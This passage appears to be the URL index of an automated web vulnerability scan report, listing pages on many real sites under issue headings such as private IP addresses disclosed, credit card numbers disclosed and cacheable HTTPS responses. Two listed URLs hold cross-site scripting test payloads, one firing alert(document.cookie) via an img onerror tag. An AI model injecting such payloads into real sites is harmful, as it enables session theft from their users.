21.75. http://blekko.com/ws/+/ip=72.32.255.178+/cwe-79

21.76. http://blekko.com/ws/+/ip=74.125.19.132

21.77. http://blekko.com/ws/+/ip=82.165.200.22+/cwe-79

21.78. http://blekko.com/ws/+/ip=82.165.91.243

21.79. http://blekko.com/ws/+/ip=82.165.91.243+/cwe-79

21.80. http://blekko.com/ws/+/ip=87.230.63.11

21.81. http://blekko.com/ws/+/ip=87.230.63.11+/cwe-79

21.82. http://blekko.com/ws/+/ip=94.23.150.190

21.83. http://blekko.com/ws/+/ip=94.23.150.190+/cwe-79

21.84. http://blekko.com/ws/+/press-videos

21.85. http://blekko.com/ws/+/privacy

21.86. http://blekko.com/ws/+/terms

21.87. http://blekko.com/ws/+/topspam

21.88. http://blekko.com/ws/+/webmaster

21.89. http://blekko.com/ws/+{searchTerms}

21.90. http://blekko.com/ws/cure+for+headaches

21.91. http://blekko.com/ws/global+warming+/liberal

21.92. http://blekko.com/ws/xss

21.93. http://blekko.com/ws/xss%20/cwe-79/

21.94. http://blekko.com/ws/xss%20cloudscan/

21.95. http://blekko.com/ws/xss+/blekko/groundhog-day

21.96. http://blekko.com/ws/xss+/cwe-79

21.97. http://blekko.com/ws/xss+/cwe-79+/site=acunetix.com

21.98. http://blekko.com/ws/xss+/cwe-79+/site=blogs.msdn.com

21.99. http://blekko.com/ws/xss+/cwe-79+/site=cgisecurity.com

21.100. http://blekko.com/ws/xss+/cwe-79+/site=en.wikipedia.org

21.101. http://blekko.com/ws/xss+/cwe-79+/site=f-secure.com

21.102. http://blekko.com/ws/xss+/cwe-79+/site=github.com

21.103. http://blekko.com/ws/xss+/cwe-79+/site=golem.ph.utexas.edu

21.104. http://blekko.com/ws/xss+/cwe-79+/site=googleonlinesecurity.blogspot.com

21.105. http://blekko.com/ws/xss+/cwe-79+/site=ha.ckers.org

21.106. http://blekko.com/ws/xss+/cwe-79+/site=microsoft.com

21.107. http://blekko.com/ws/xss+/cwe-79+/site=owasp.org

21.108. http://blekko.com/ws/xss+/cwe-79+/site=praetorianprefect.com

21.109. http://blekko.com/ws/xss+/cwe-79+/site=scmagazineus.com

21.110. http://blekko.com/ws/xss+/cwe-79+/site=seancoates.com

21.111. http://blekko.com/ws/xss+/cwe-79+/site=techmynd.com

21.112. http://blekko.com/ws/xss+/cwe-79+/site=thespanner.co.uk

21.113. http://blekko.com/ws/xss+/cwe-79+/site=veracode.com

21.114. http://blekko.com/ws/xss+/cwe-79+/site=xss-proxy.sourceforge.net

21.115. http://blekko.com/ws/xss+/cwe-79+/site=xss.com

21.116. http://blekko.com/ws/xss+/cwe-79+/site=xssed.com

21.117. http://blekko.com/ws/xss+/date

21.118. http://blekko.com/ws/xss+/flickr

21.119. http://blekko.com/ws/xss+/foss

21.120. http://blekko.com/ws/xss+/it

21.121. http://blekko.com/ws/xss+/rank

21.122. http://blekko.com/ws/xss+/rss

21.123. http://blekko.com/ws/xss+/shop

21.124. http://blekko.com/ws/xss+/site=acunetix.com

21.125. http://blekko.com/ws/xss+/site=blogs.msdn.com

21.126. http://blekko.com/ws/xss+/site=cgisecurity.com

21.127. http://blekko.com/ws/xss+/site=en.wikipedia.org

21.128. http://blekko.com/ws/xss+/site=f-secure.com

21.129. http://blekko.com/ws/xss+/site=github.com

21.130. http://blekko.com/ws/xss+/site=golem.ph.utexas.edu

21.131. http://blekko.com/ws/xss+/site=googleonlinesecurity.blogspot.com

21.132. http://blekko.com/ws/xss+/site=ha.ckers.org

21.133. http://blekko.com/ws/xss+/site=microsoft.com

21.134. http://blekko.com/ws/xss+/site=owasp.org

21.135. http://blekko.com/ws/xss+/site=praetorianprefect.com

21.136. http://blekko.com/ws/xss+/site=scmagazineus.com

21.137. http://blekko.com/ws/xss+/site=seancoates.com

21.138. http://blekko.com/ws/xss+/site=techmynd.com

21.139. http://blekko.com/ws/xss+/site=thespanner.co.uk

21.140. http://blekko.com/ws/xss+/site=veracode.com

21.141. http://blekko.com/ws/xss+/site=xss-proxy.sourceforge.net

21.142. http://blekko.com/ws/xss+/site=xss.com

21.143. http://blekko.com/ws/xss+/site=xssed.com

21.144. http://blekko.com/ws/xss+/techblogs

21.145. http://blekko.com/ws/xss+/technology

21.146. http://blekko.com/ws/xss+/youtube

21.147. http://blekko.com/ws/xss+clouds+can

21.148. http://blekko.com/ws/xss+cloudscan

21.149. http://blekko.com/ws/xss+cloudscan+/blekko/groundhog-day

21.150. http://blekko.com/ws/xss+cloudscan+/date

21.151. http://blekko.com/ws/xss+cloudscan+/rank

21.152. http://blekko.com/ws/xss+cloudscan+/rss

21.153. http://blekko.com/ws/xss+cloudscan+/shop

21.154. http://blekko.com/ws/xss+cloudscan+/site=

21.155. http://blekko.com/ws/xss+cloudscan+/site=cloudscan.blogspot.com

21.156. http://blekko.com/ws/xss+cloudscan+/youtube

21.157. http://blekko.com/ws/xss/

21.158. https://blekko.com/join

21.159. https://blekko.com/login

21.160. https://blekko.com/s/images/wait24trans.gif

21.161. https://blekko.com/ws/+/privacy

21.162. https://blekko.com/ws/+/terms

21.163. http://boardreader.com/affiliate/gagbanner.html

21.164. http://boardreader.com/info/policy.htm

21.165. http://boardreader.com/info/submit.htm

21.166. http://boardreader.com/js/dyn/b78df7b9a5de6ff283b7cf94ec615217.js

21.167. http://boardreader.com/opensearch.xml

21.168. http://clickaider.com/

21.169. http://code.google.com/p/swfobject/

21.170. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

21.171. http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz

21.172. http://dean.edwards.name/weblog/2006/06/again/

21.173. http://developers.facebook.com/devgarage

21.174. http://developers.facebook.com/docs/opengraph

21.175. http://dillerdesign.com/experiment/DD_belatedPNG/

21.176. http://editorial.autos.msn.com/blogs/autosblog.aspx

21.177. http://erncpa.com/

21.178. https://faq.orbitz.com/app/answers/detail/a_id/15644

21.179. http://feeds.feedburner.com/omniture/blogs/all

21.180. http://forums.plentyoffish.com/datingposts6866122.aspx

21.181. http://gocitykids.parentsconnect.com/data/service-calendar.json

21.182. http://golem.ph.utexas.edu/~distler/blog/atom10.xml

21.183. http://groups.google.com/groups

21.184. http://gsgd.co.uk/sandbox/jquery/easing/

21.185. http://ie6funeral.com/

21.186. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

21.187. http://jquery.malsup.com/license.html

21.188. http://jqueryui.com/about

21.189. http://lec.edu/fckeditor/editor/fckeditor.php

21.190. http://login.live.com/login.srf

21.191. https://login.live.com/login.srf

21.192. http://medienfreunde.com/lab/innerfade/js/jquery.innerfade.js

21.193. http://mir.aculo.us/

21.194. http://mofones.com/

21.195. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

21.196. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

21.197. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/

21.198. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

21.199. http://pressroom.orbitz.com/

21.200. https://publish.omniture.com/center/util/

21.201. http://scripts.omniture.com/javascript.js

21.202. https://secure.avangate.com/order/nojs.php

21.203. https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js

21.204. https://sitesearch.omniture.com/center/util/

21.205. http://stackoverflow.com/questions/1890512/handling-errors-in-jquerydocument-ready

21.206. http://static1.degreetree.com/fossa/assets/jsx/ext-2.2.1/ext.js

21.207. http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/

21.208. http://trw.mediaroom.com/index.php

21.209. http://tv.msn.com/last-night-on-tv/

21.210. http://twitter.com/JohnsHopkinsSPH

21.211. http://twitter.com/about/contact

21.212. http://twitter.com/arnui

21.213. http://twitter.com/javascripts/widgets/widget.js

21.214. https://twitter.com/about/contact

21.215. https://twitter.com/signup

21.216. http://webcache.googleusercontent.com/search

21.217. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

21.218. https://www.astaro.co.uk/beacon/(beid

21.219. http://www.astaro.com/

21.220. http://www.astaro.com/advanced

21.221. http://www.astaro.com/buy-astaro

21.222. http://www.astaro.com/callback

21.223. http://www.astaro.com/company/advanced

21.224. http://www.astaro.com/company/astaro-management-team

21.225. http://www.astaro.com/company/astaro-supervisory-board

21.226. http://www.astaro.com/company/career

21.227. http://www.astaro.com/company/company-profile

21.228. http://www.astaro.com/company/contact-astaro

21.229. http://www.astaro.com/company/javascript:void()

21.230. http://www.astaro.com/company/sponsorship

21.231. http://www.astaro.com/company/worldwide-offices

21.232. http://www.astaro.com/gateway/builder/settings

21.233. http://www.astaro.com/javascript:void()

21.234. http://www.astaro.com/landingpages/data/en-privacy-policy.html

21.235. http://www.astaro.com/legal-statement

21.236. http://www.astaro.com/newsletter

21.237. http://www.astaro.com/products

21.238. http://www.astaro.com/products/access-points

21.239. http://www.astaro.com/products/astaro-clients

21.240. http://www.astaro.com/products/astaro-command-center

21.241. http://www.astaro.com/products/astaro-red

21.242. http://www.astaro.com/products/astaro-security-gateway-software-appliance

21.243. http://www.astaro.com/products/astaro-security-gateway-virtual-appliance-for-vmware

21.244. http://www.astaro.com/products/astaro-smart-installer

21.245. http://www.astaro.com/products/hardware-appliances

21.246. https://www.astaro.com/beacon/(beid

21.247. https://www.astaro.com/design/en/javascript/jquery.dimensions.js

21.248. https://www.astaro.com/en

21.249. https://www.astaro.com/en/content/advancedsearch

21.250. https://www.astaro.com/en/myastaro

21.251. https://www.astaro.com/en/myastaro/contact_us

21.252. https://www.astaro.com/en/user/login

21.253. https://www.astaro.com/tool/signup

21.254. https://www.astaro.com/user/login

21.255. https://www.astaro.de/beacon/(beid

21.256. http://www.astaro.es/

21.257. https://www.astaro.net/beacon/(beid

21.258. http://www.bing.com/s/osd3.xml

21.259. http://www.cs.tut.fi/~jkorpela/quirks-mode.html,

21.260. http://www.dillerdesign.com/experiment/DD_belatedPNG/

21.261. http://www.directstartv.com/

21.262. http://www.ehow.com/about_us/about_us.aspx

21.263. http://www.ehow.com/about_us/faq_ehow.aspx

21.264. http://www.ehow.com/privacy.aspx

21.265. http://www.ehow.com/terms_use.aspx

21.266. https://www.ehow.com/privacy.aspx

21.267. https://www.ehow.com/terms_use.aspx

21.268. http://www.exploit-db.com/exploits/15313/

21.269. http://www.faneuilhallmarketplace.com/

21.270. http://www.gnu.org/copyleft/gpl.html

21.271. http://www.gnu.org/licenses/gpl.html

21.272. http://www.google.com/finance

21.273. http://www.google.com/search

21.274. https://www.google.com/accounts/Login

21.275. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

21.276. http://www.huddletogether.com/projects/lightbox2/

21.277. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js

21.278. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js

21.279. http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a

21.280. http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html

21.281. http://www.millenniumhotels.co.nz/copthornebayofislands/index.html

21.282. http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html

21.283. http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html

21.284. http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html

21.285. http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html

21.286. http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html

21.287. http://www.millenniumhotels.co.nz/copthornehokianga/index.html

21.288. http://www.millenniumhotels.co.nz/copthornemarlborough/index.html

21.289. http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html

21.290. http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html

21.291. http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html

21.292. http://www.millenniumhotels.co.nz/copthornewairarapa/index.html

21.293. http://www.millenniumhotels.co.nz/kingsgateauckland/index.html

21.294. http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html

21.295. http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html

21.296. http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html

21.297. http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html

21.298. http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html

21.299. http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html

21.300. http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html

21.301. http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html

21.302. http://www.millenniumhotels.co.nz/kingsgateteanau/index.html

21.303. http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html

21.304. http://www.millenniumhotels.co.nz/kingsgatewellington/index.html

21.305. http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html

21.306. http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html

21.307. http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html

21.308. http://www.millenniumhotels.co.nz/millenniumrotorua/index.html

21.309. http://www.millenniumhotels.co.nz/millenniumtaupo/index.html

21.310. http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html

21.311. http://www.millenniumhotels.co.uk/copthornebirmingham/index.html

21.312. http://www.millenniumhotels.co.uk/copthornecardiff/index.html

21.313. http://www.millenniumhotels.co.uk/copthornedudley/index.html

21.314. http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html

21.315. http://www.millenniumhotels.co.uk/copthornegatwick/index.html

21.316. http://www.millenniumhotels.co.uk/copthornemanchester/index.html

21.317. http://www.millenniumhotels.co.uk/copthornenewcastle/index.html

21.318. http://www.millenniumhotels.co.uk/copthorneplymouth/index.html

21.319. http://www.millenniumhotels.co.uk/copthornereading/index.html

21.320. http://www.millenniumhotels.co.uk/copthornesheffield/index.html

21.321. http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html

21.322. http://www.millenniumhotels.co.uk/copthornetarakensington/index.html

21.323. http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html

21.324. http://www.millenniumhotels.co.uk/millenniumglasgow/index.html

21.325. http://www.millenniumhotels.co.uk/millenniumgloucester/index.html

21.326. http://www.millenniumhotels.co.uk/millenniumkensington/index.html

21.327. http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html

21.328. http://www.millenniumhotels.co.uk/millenniummayfair/index.html

21.329. http://www.millenniumhotels.co.uk/millenniumreading/index.html

21.330. http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html

21.331. http://www.millenniumhotels.com/ae/goldmohurhoteladen/index.html

21.332. http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html

21.333. http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html

21.334. http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html

21.335. http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html

21.336. http://www.millenniumhotels.com/ae/millenniumdubai/index.html

21.337. http://www.millenniumhotels.com/cn/copthorneqingdao/index.html

21.338. http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html

21.339. http://www.millenniumhotels.com/cn/millenniumchengdu/index.html

21.340. http://www.millenniumhotels.com/cn/millenniumshanghai/index.html

21.341. http://www.millenniumhotels.com/cn/millenniumwuxi/index.html

21.342. http://www.millenniumhotels.com/cn/millenniumxiamen/index.html

21.343. http://www.millenniumhotels.com/corporate/hotels/kingsgateHotels.htm

21.344. http://www.millenniumhotels.com/corporate/legalInfo.html

21.345. http://www.millenniumhotels.com/corporate/privacyPolicy.html

21.346. http://www.millenniumhotels.com/corporate/termsConditions.html

21.347. http://www.millenniumhotels.com/de/copthornehannover/index.html

21.348. http://www.millenniumhotels.com/de/millenniumstuttgart/index.html

21.349. http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html

21.350. http://www.millenniumhotels.com/fr/millenniumparis/index.html

21.351. http://www.millenniumhotels.com/id/millenniumjakarta/index.html

21.352. http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html

21.353. http://www.millenniumhotels.com/millenniumanchorage/index.html

21.354. http://www.millenniumhotels.com/millenniumboston/attractions/

21.355. http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html

21.356. http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html

21.357. http://www.millenniumhotels.com/millenniumboston/attractions/index.html

21.358. http://www.millenniumhotels.com/millenniumboston/contactus/index.html

21.359. http://www.millenniumhotels.com/millenniumboston/facilities/

21.360. http://www.millenniumhotels.com/millenniumboston/facilities/index.html

21.361. http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html

21.362. http://www.millenniumhotels.com/millenniumboston/gallery/index.html

21.363. http://www.millenniumhotels.com/millenniumboston/index.html

21.364. http://www.millenniumhotels.com/millenniumboston/meeting/index.html

21.365. http://www.millenniumhotels.com/millenniumboston/news/index.html

21.366. http://www.millenniumhotels.com/millenniumboston/restaurant/

21.367. http://www.millenniumhotels.com/millenniumboston/restaurant/index.html

21.368. http://www.millenniumhotels.com/millenniumboston/rooms/

21.369. http://www.millenniumhotels.com/millenniumboston/rooms/index.html

21.370. http://www.millenniumhotels.com/millenniumboston/rooms/suite.html

21.371. http://www.millenniumhotels.com/millenniumboston/specials/index.html

21.372. http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html

21.373. http://www.millenniumhotels.com/millenniumboulder/index.html

21.374. http://www.millenniumhotels.com/millenniumbuffalo/index.html

21.375. http://www.millenniumhotels.com/millenniumchicago/index.html

21.376. http://www.millenniumhotels.com/millenniumcincinnati/index.html

21.377. http://www.millenniumhotels.com/millenniumdurham/index.html

21.378. http://www.millenniumhotels.com/millenniumlosangeles/index.html

21.379. http://www.millenniumhotels.com/millenniumminneapolis/index.html

21.380. http://www.millenniumhotels.com/millenniumnashville/index.html

21.381. http://www.millenniumhotels.com/millenniumnewyork/index.html

21.382. http://www.millenniumhotels.com/millenniumscottsdale/index.html

21.383. http://www.millenniumhotels.com/millenniumstlouis/index.html

21.384. http://www.millenniumhotels.com/millenniumunplazanewyork/index.html

21.385. http://www.millenniumhotels.com/my/copthornepenang/index.html

21.386. http://www.millenniumhotels.com/opening/millenniumveetaichung.html

21.387. http://www.millenniumhotels.com/ph/heritagemanila/index.html

21.388. http://www.millenniumhotels.com/premierhotelnewyork/index.html

21.389. http://www.millenniumhotels.com/qa/millenniumdoha/index.html

21.390. http://www.millenniumhotels.com.cn/

21.391. http://www.millenniumhotels.com.sg/StudioMHotel/index.html

21.392. http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html

21.393. http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html

21.394. http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html

21.395. http://www.millenniumhotels.com.sg/mhotelsingapore/index.html

21.396. http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html

21.397. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science

21.398. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/

21.399. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/

21.400. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar

21.401. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/

21.402. http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting

21.403. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/

21.404. http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts

21.405. http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/

21.406. http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/

21.407. http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/

21.408. http://www.msnbc.msn.com/id/41363738/ns/weather

21.409. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/

21.410. http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times

21.411. http://www.msnbc.msn.com/id/41365053

21.412. http://www.msnbc.msn.com/id/41365053/ns/weather/

21.413. http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa

21.414. http://www.msnbc.msn.com/id/41367374/ns/world_news-europe

21.415. http://www.nolanfans.com/

21.416. http://www.omniture.com/en/education

21.417. http://www.omniture.com/en/education/academic_initiative

21.418. http://www.omniture.com/en/education/certification

21.419. http://www.omniture.com/en/education/certification/implementation

21.420. http://www.omniture.com/en/education/certification/insight_analyst

21.421. http://www.omniture.com/en/education/certification/insight_architect

21.422. http://www.omniture.com/en/education/certification/search_center

21.423. http://www.omniture.com/en/education/certification/site_catalyst

21.424. http://www.omniture.com/en/education/certification/support

21.425. http://www.omniture.com/en/education/certification/test_target

21.426. http://www.omniture.com/en/education/courses/discover

21.427. http://www.omniture.com/en/education/courses/dop_analyst

21.428. http://www.omniture.com/en/education/courses/merchandising

21.429. http://www.omniture.com/en/education/courses/online_marketing_suite

21.430. http://www.omniture.com/en/education/courses/sbu

21.431. http://www.omniture.com/en/education/courses/searchcenter

21.432. http://www.omniture.com/en/education/courses/sitesearch

21.433. http://www.omniture.com/en/education/courses/survey

21.434. http://www.omniture.com/en/education/courses/testandtarget

21.435. http://www.omniture.com/en/privacy/policy

21.436. http://www.omniture.com/press/867

21.437. http://www.omniture.com/press/868

21.438. http://www.opensource.org/licenses/gpl-license.php

21.439. http://www.opensource.org/licenses/mit-license.php

21.440. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp

21.441. http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js

21.442. http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js

21.443. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp

21.444. http://www.owasp.org/index.php

21.445. http://www.rascals.eu/

21.446. http://www.revresda.com/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=31,43,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,66867,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68376,102874,102875,103013,103016&RawValues=&/

21.447. http://www.revresda.com/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=46,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,67440,67898,67941,67944,68027,68032,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&/

21.448. http://www.robtex.com/as/as15169.html

21.449. http://www.robtex.com/as/as26415.html

21.450. http://www.robtex.com/as/as36617.html

21.451. http://www.robtex.com/as/as36618.html

21.452. http://www.robtex.com/as/as36620.html

21.453. http://www.robtex.com/as/as36621.html

21.454. http://www.robtex.com/as/as36623.html

21.455. http://www.robtex.com/as/as36624.html

21.456. http://www.robtex.com/as/as36625.html

21.457. http://www.robtex.com/as/as36626.html

21.458. http://www.robtex.com/as/as36629.html

21.459. http://www.robtex.com/dns/orkut.com.html

21.460. http://www.robtex.com/faq.html

21.461. http://www.scmagazineus.com/search/xss/

21.462. http://www.sitepoint.com/article/browser-specific-css-hacks

21.463. http://www.threatexpert.com/contact.aspx

21.464. http://www.trip.com/

21.465. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

21.466. http://www.w3.org/TR/html4/strict.dtd

21.467. http://www.wordpresstemplates.com/

21.468. http://www.worldmastiffforum.com/

21.469. http://www.xss.com/

21.470. http://xss-proxy.sourceforge.net/

22. Private IP addresses disclosed

22.1. http://blog.threatexpert.com/

22.2. http://businessonmain.msn.com/videos/coolrunnings.aspx

22.3. https://login.facebook.com/ajax/intl/language_dialog.php

22.4. https://login.facebook.com/ajax/intl/language_dialog.php

22.5. http://pixel.facebook.com/ajax/register/logging.php

22.6. http://pixel.facebook.com/ajax/register/logging.php

22.7. http://vimeo.com/moogaloop.swf

22.8. http://vimeo.com/moogaloop.swf

22.9. http://vimeo.com/moogaloop.swf

22.10. http://www.facebook.com/ajax/intl/language_dialog.php

22.11. http://www.facebook.com/ajax/intl/language_dialog.php

22.12. http://www.facebook.com/ajax/intl/language_dialog.php

22.13. http://www.facebook.com/ajax/reg_birthday_help.php

22.14. http://www.facebook.com/platform

22.15. http://www.google.com/sdch/GeNLY2f-.dct

22.16. http://www.msnbc.msn.com/

22.17. http://www.msnbc.msn.com/id/3032072/ns/business

22.18. http://www.msnbc.msn.com/id/3032076/ns/health

22.19. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science

22.20. http://www.msnbc.msn.com/id/3032507/ns/world_news

22.21. http://www.msnbc.msn.com/id/3032525/ns/us_news

22.22. http://www.msnbc.msn.com/id/3032553/ns/politics

22.23. http://www.pctools.com/registry-mechanic/

22.24. http://www.robtex.com/as/as15169.html

22.25. http://www.scmagazineus.com/search/xss/

23. Credit card numbers disclosed

23.1. https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf

23.2. http://maps.google.com/maps

23.3. http://www.bing.com/travel/content/search

23.4. http://www.ehow.com/how_2113353_end-sibling-feuds.html

23.5. http://www.robtex.com/as/as36623.html

24. Robots.txt file

24.1. http://go.microsoft.com/fwlink/

24.2. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

24.3. http://pixel.facebook.com/ajax/register/logging.php

24.4. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.5. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.6. http://www.astaro.com/newsletter

24.7. https://www.astaro.com/design/en/javascript/main.js

24.8. http://www.google-analytics.com/siteopt.js

24.9. http://www.googleadservices.com/pagead/conversion/1072269077/

25. Cacheable HTTPS response

25.1. https://adadvisor.net/adscores/g.json

25.2. https://ads.pof.com/

25.3. https://ads.pof.com/Default.aspx

25.4. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)

25.5. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png

25.6. https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf

25.7. https://ads.pof.com/ui/Message.aspx

25.8. https://ads.pof.com/ui/RetrievePassword.aspx

25.9. https://amihackerproof.com/about_us.php

25.10. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

25.11. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx

25.12. https://gc.synxis.com/XBE/ScriptResource.axd

25.13. https://gc.synxis.com/XBE/WebResource.axd

25.14. https://gc.synxis.com/rez.aspx

25.15. https://gc.synxis.com/xbe/Services/XbeService.asmx/CheckForPackages

25.16. https://gc.synxis.com/xbe/rez.aspx

25.17. https://hostedusa3.whoson.com/chat/chatstart.htm

25.18. https://leads.demandbase.com/

25.19. https://login.facebook.com/ajax/intl/language_dialog.php

25.20. https://maps-api-ssl.google.com/maps

25.21. https://maps-api-ssl.google.com/maps/api/js

25.22. https://my.omniture.com/login/

25.23. https://my.omniture.com/p/suite/1.2/index.html

25.24. https://my.omniture.com/p/suite/current/authentication/get_login_domain.html

25.25. https://my.omniture.com/password_recovery.html

25.26. https://my.omniture.com/support_popup_form.html

25.27. https://picasaweb.google.com/lh/view

25.28. https://publish.omniture.com/center/

25.29. https://publish.omniture.com/center/util/

25.30. https://secure.opinionlab.com/ccc01/o.asp

25.31. https://sitesearch.omniture.com/center/

25.32. https://sitesearch.omniture.com/center/util/

25.33. https://trustseal.verisign.com/getseal

25.34. https://trustsealinfo.verisign.com/splash

25.35. https://twitter.com/jobs

25.36. https://twitter.com/oexchange.xrd

25.37. https://www.astaro.com/design/en/images/icons/favicon.ico

25.38. https://www.ehow.com/account/facebook_merge.aspx

25.39. https://www.ehow.com/account/simple_login.aspx

25.40. https://www.ehow.com/account/simple_register.aspx

25.41. https://www.ehow.com/ajax/loginbyfacebookid.aspx

25.42. https://www.ehow.com/forms/

25.43. https://www.ehow.com/forms/PasswordRetrieval.aspx

25.44. https://www.ehow.com/forms/signin.aspx

25.45. https://www.ehow.com/privacy.aspx

25.46. https://www.ehow.com/terms_use.aspx

25.47. https://www.ehow.com/xd_receiver.htm

26. Multiple content types specified

27. HTML does not specify charset

27.1. http://a0.twimg.com/a/1296609216/stylesheets/fronts.css

27.2. http://a0.twimg.com/profile_images/1160091262/science100x100_normal.jpg

27.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033

27.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24

27.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

27.6. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67

27.7. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11

27.8. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

27.9. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5

